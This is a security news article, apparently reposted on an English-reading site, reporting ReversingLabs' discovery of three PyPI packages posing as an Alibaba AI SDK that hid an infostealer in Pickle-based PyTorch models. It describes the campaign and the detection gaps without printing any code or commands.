英语轻松读发新版了,欢迎下载、更新

Malicious Machine Learning Model Attack Discovered on PyPI

2025-05-27 13:00:00 英文原文

作者:Alessandro Mascellino

Written by

A new campaign exploiting machine learning (ML) models via the Python Package Index (PyPI) has been observed by cybersecurity researchers.

ReversingLabs said threat actors are using the Pickle file format to conceal malware inside seemingly legitimate AI-related software packages.

In this recent incident, attackers published three deceptive packages: aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk and aliyun-ai-labs-sdk, claiming to offer a Python SDK for Alibaba’s AI services.

These packages, however, contained no functional code related to AI. Instead, they deployed an infostealer payload embedded within PyTorch models, which are essentially zipped Pickle files.

Upon installation, the payload was activated from the initialization script.

The malware was designed to extract:

  • User and network information
  • The target machine’s organizational affiliation
  • Contents of the .gitconfig file

Notably, the malicious models also attempted to identify developers associated with the Chinese video conferencing tool AliMeeting, suggesting a regional focus.

Read more on software supply chain security: AI Hallucinations Create “Slopsquatting” Supply Chain Threat

PyTorch and Pickle: A Dangerous Combination

According to ReversingLabs, this incident highlights the growing threat posed by the misuse of ML model formats.

Pickle allows serialized Python objects to execute arbitrary code. As a result, it has become a preferred vector for attackers aiming to bypass traditional security controls. Two of the three identified packages used this method to deliver fully functional malware.

The researchers believe the appeal of ML formats is because many security tools do not yet support robust detection of embedded malicious behavior within such files.

“Security tools are at a primitive level when it comes to malicious ML model detection,” said Karlo Zanki, a reverse engineer at ReversingLabs. 

“Legacy security tooling is currently lacking this required functionality.”

The infected packages were briefly available on PyPI and downloaded approximately 1600 times before removal. 

While the exact method used to lure users remains unclear, social engineering or phishing is suspected.

As AI and ML tools become central to software development, this attack underscores the need for stricter validation and zero-trust principles in handling ML artifacts.

Photo credits: sdx15/Shutterstock

What’s hot on Infosecurity Magazine?

关于《Malicious Machine Learning Model Attack Discovered on PyPI》的评论


暂无评论

发表评论

摘要

Cybersecurity researchers at ReversingLabs have detected a new campaign where threat actors exploit machine learning models via PyPI by concealing malware in seemingly legitimate AI-related software packages. The attackers published three deceptive Python SDK packages for Alibaba's AI services, which instead contained infostealer payloads within PyTorch models using the Pickle file format. These payloads were designed to extract user and network information, identify organizational affiliation, and access .gitconfig files upon installation. The attack highlights security vulnerabilities related to ML model formats and the need for improved detection mechanisms in legacy security tools.